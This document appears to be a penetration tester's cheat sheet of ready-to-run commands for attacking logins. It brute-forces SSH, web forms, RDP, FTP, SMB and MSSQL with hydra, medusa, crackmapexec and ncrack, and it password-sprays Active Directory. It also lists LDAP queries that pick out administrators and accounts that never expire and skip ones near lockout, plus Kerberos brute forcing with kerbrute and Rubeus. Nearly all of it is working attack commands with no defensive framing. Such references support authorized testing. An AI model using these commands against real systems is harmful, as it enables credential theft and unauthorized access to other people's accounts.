Authentication tests

Login/Authentication - Brute Force

From Linux

SSH

crackmapexec <ssh> <ip/range> -u user -p password (-d <domain or .>)
auxiliary/scanner/ssh/ssh_login
hydra -e -l root -P <dico> <ip> ssh
hydra -e -L <userlist.txt> -P <dico> <ip> -s 22 ssh -V

HTTP

cewl <url> -m 6 -w cewl.txt
john --wordlist=cewl.txt --rules --stdout > mutated.txt
medusa -h <ip> -u <user> -P mutated.txt -M http -n 80 -m DIR:</directory/to/login/panel> -T 30

Match success string

hydra -e -s 443 -S -l <username> -P <dico.txt> -t <16> \
        -m <url> <ip> https-post-form \
        "<url>:<username_var>=^USER^&<password_var>=^PASS^:S=<match success>(:H=Host\: <vhost>)"

Match failed attempt string

hydra -e -s 443 -S -l <username> -P <dico.txt> -t <16> \
        -m <url> <ip> https-post-form \
        "<url>:<username_var>=^USER^&<password_var>=^PASS^:=<failed attempt string>(:H=Host\: <vhost>)"
hydra -e -s 443 -S -l admin -P <dico.txt> -t 16 -m /wp-login.php <ip> https-post-form "/wp-login.php:log=^USER^&pwd=^PASS^:S=302 Found"
xhydra (ftp/pop3/smtp/snmp/http/ssh/mysql/vnc/...)
medusa -h <ip> -u <user> -P <dict> -m DIR:</phpmyadmin/> -t <10> -M http

MySQL

mysql -h <ip> --user=<username> --password=<password> (DB)

MSSQL

sqsh -S <ip>:<port> -U <user> -P <password>
sqlcmd -S <ip>:<port> -U SA -P <password>
nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=<password>,ms-sql-xp-cmdshell.cmd="whoami" <ip> 

RDP (not tested)

rdesktop <ip> 
rdesktop <ip> -u <user> -p - -d <domain> -g <1280x1024>
rdesktop <ip> -u <user> -p <password> -d <domain> -g <1280x1024>
rdesktop <ip> -u <user> -p <password> -g <85%> -r disk:share=</path/to/share>
hydra -e -t <10> -V -f -L <user> -P <dict> rdp://<ip>
xfreerdp /v:<ip>:<port> /u:<user> /p:<password/hash> /d:<domain> /dynamic-resolution
ncrack -vv --user <user> -P <dict> rdp://<ip>

FTP

auxiliary/scanner/ftp/ftp_login
medusa -h <ip> -u <user> -P <dict> -M ftp -t 10

SMB

smbclient //<ip>/<c$> <password> -U <user>
crackmapexec <smb> <ip/range> -u user -p password (-d <domain or .>)
From Windows
for /f %i in (<dico.txt>) do @echo %i & @net use \\<ip> %i /u:<user> 2>nul && pause

Append result into a file

for /F in %i in (<dico.txt>) do @echo %i & @net use \\<ip> %i /u:<user> 2>nul && echo <user>: %i >> >out>

Password spray

List targets

Users list

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties.samaccountname
([adsisearcher]"(&(objectCategory=person)(objectClass=user)(samaccountname=*)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(badpwdcount<=<max_lockout_attempt - 2>))").FindAll().Properties.samaccountname

Administrators list

Default protected administrative groups in Active Directory:

  • Enterprise Admins
  • Schema Admins
  • Domain Admins
  • Administrators
  • Account Operators
  • Server Operators
  • Print Operators
  • Backup Operators
  • Cert Publishers
  • Domain Controllers
  • Read-Only Domain Controllers
  • Replicator

([adsisearcher]"(&(objectClass=User)(admincount=1))").FindAll().Properties.samaccountname

Never expired accounts

([adsisearcher]"(&(objectClass=User)(samaccountname=*))").FindAll().Properties | ForEach-Object{ if (($_.useraccountcontrol[0] -band 0x00010000) -and -not ($_.useraccountcontrol[0] -band 0x00000002)){ Write-Host $_.cn}}

Clean and safe list without disabled or potential lockouts accounts
https://github.com/dafthack/DomainPasswordSpray

Get-DomainUserList -RemoveDisabled -RemovePotentialLockouts
Attacks
Invoke-DomainPasswordSpray (-UserList users.txt) -Domain <domain_name> (-PasswordList <passlist.txt> | -Password <password>) -OutFile <loot.txt>
Invoke-DomainPasswordSpray -Domain <domain_name> -Password <password> -OutFile <loot.txt>

CME

while read user; do crackmapexec <range> -u $user -p <password> -d <domain>; done < <users.txt>
while read user; do crackmapexec <range> -u $user -p $user -d <domain>; done < <users.txt>

MSF

use auxiliary/scanner/smb/smb_login

RDPassSpray
https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -U <users.txt> -p <password> -d <domain> -t <host>

Kerberos methods - NOT TESTED

python kerbrute.py -domain <domain> -users <users.txt> -passwords <dico.txt> -outputfile <out>
.\Rubeus.exe brute [/users:<users.txt>] /passwords:<dico.txt> [/domain:<domain>] /outfile:<out>